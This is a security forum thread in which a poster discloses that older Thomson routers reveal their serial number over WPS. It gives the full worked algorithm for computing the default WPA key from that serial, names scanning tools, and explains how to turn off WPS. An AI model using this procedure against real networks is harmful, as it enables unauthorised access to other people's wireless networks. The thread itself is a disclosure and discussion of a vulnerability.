If this is your first visit, be sure to
check out the Forum Rules by clicking the
link above. You may have to register
before you can post: click the register link above to proceed. To start viewing messages,
select the forum that you want to visit from the selection below.

Re: What can someone do after discovering a "exploit"?

So, it turns out there was already a tool capable of exploiting what I discovered, the only thing I am is the first person to notice this flaw on the maker routers, and now, bring it to public. The affected router brand is Thomson and, as I recently got access to a latest model of this routers (TG784n)*, I have to re-phrase my initial statement. This flaw can only be found on older models of this brand of routers.

*: I found a colleague with this kind of router, and he gave me visual access to the router (the only thing I needed to test the flaw) and the wireless key I got trough the calculations differed from the default wireless key found in the sticker. So I assume that newer models (maybe from 2010/11 to the future) do not have this vulnerability.

In order to explain my findings, I have to introduce some background:
As some (or all, given that we are on a security related forum) of you may know, back in 2008, Kevin Devine discovered a flaw in SpeedTouch and Thomson routers that would allow him to calculate the default wireless encryption key for each router. He released a tool capable of calculating and providing the user with the default password, only using the last 6 characters of the default SSID (More info @ GNUCitizen.org ).

But, somewhat around 2010, Thomson fixed this vulnerability by changing the last 6 digits of the default SSID (now they match the last 6 digits of the wireless interface MAC address, instead of the last 6 digits from the sha1 hash [read link above]). Unfortunately, it was still insecure, since with Kevin's findings, it was possible to generate a password list for every router made in 2010/2011 (and now 2012) that would substantially reduce the brute-force attack time against a WPA handshake (I talked about this vulnerability in this forums a while back, a quick search should reveal it). That must be why they changed the whole algorithm in newer models.

Now, with the recent discovery of WPS vulnerabilities, one of them being that the routers give too much information about themselves, such as maker, model and Serial Number ("Oh!" you say ), it was easy to develop a way to use this information to get the default wireless key:

Using a tool called wpscan (not the WordPress one) developed by SourceSec, an attacker could get a output like this (values are fictional):

From this, an attacker could check if the router has this flaw (by checking the model, in blue) and if it was vulnerable, he would grab the Serial Number and start the calculation process:

Code:

1011TSABC

Add "CP" to the beginning of the string and remove "TS" value (always the 2 characters in-between the first 4 numbers and the last 3 characters):

Code:

CP1011ABC

Convert last 3 characters to hexadecimal (and convert lowercase to uppercase, case it has letters):

Code:

CP1011414243

Process this last string trough sha-1:

Code:

8d6bea96fc2eb7b52020c45492e379cab1940d89

Grab the first 10 digits, Uppercase them, and here is the default wireless key:

Code:

8D6BEA96FC

Note: If you're going to test this, please try to isolate your AP on a specific channel, airodump that channel and run wpscan after. I'm telling you this because "WPScan actively sends 802.11 probe requests to access points that advertise WPS support", and that could be considered illegal (I'm not sure, but just to be safe...).

Cheers!

P.S.: This vulnerability can be fixed by turning off WPS, wich is enabled by default. It can be done trough telnet (never found the option on the web interface), this site will help with the commands needed. Obviously, even after turning off WPS, the router will not be secure if it has the default password set (due to the other vulnerabilities I mentioned earlier).

Re: What can someone do after discovering a "exploit"?

@Snayler this is very interesting. I suspect many router vendors employ similar means to derive default WPA keys. Since the key is ultimately the product of the non-reversible SHA1 hash function, I wonder, how did you derive the algorithm, specifically the part about adding CP and removing TS? Did you just play around with serial numbers until you figured it out?

Re: What can someone do after discovering a "exploit"?

Originally Posted by ternarybit

@Snayler this is very interesting. I suspect many router vendors employ similar means to derive default WPA keys. Since the key is ultimately the product of the non-reversible SHA1 hash function, I wonder, how did you derive the algorithm, specifically the part about adding CP and removing TS? Did you just play around with serial numbers until you figured it out?

No! I'm not that smart Back in April 2008, Kevin Devine discovered that flaw (calculating the default password from the serial number) and created a PoC where you can calculate all possible default passwords based on the last 6 chars of the default SSID. Around 2009/2010, Thomson (I guess) fixed this issue by changing the last chars of the SSID to the last 6 chars of the AP's MAC address. This fixed the vulnerability found by Kevin, but I discovered that the router freely announces it's serial number through WPS. So I just had to check Kevin's discovery on how to calculate the default password from the serial number and ta-da! Vulnerability found. If you want, you can read more about Kevin's findings in the link posted by hannah. If you want a more hardcore explanation, you can read it here: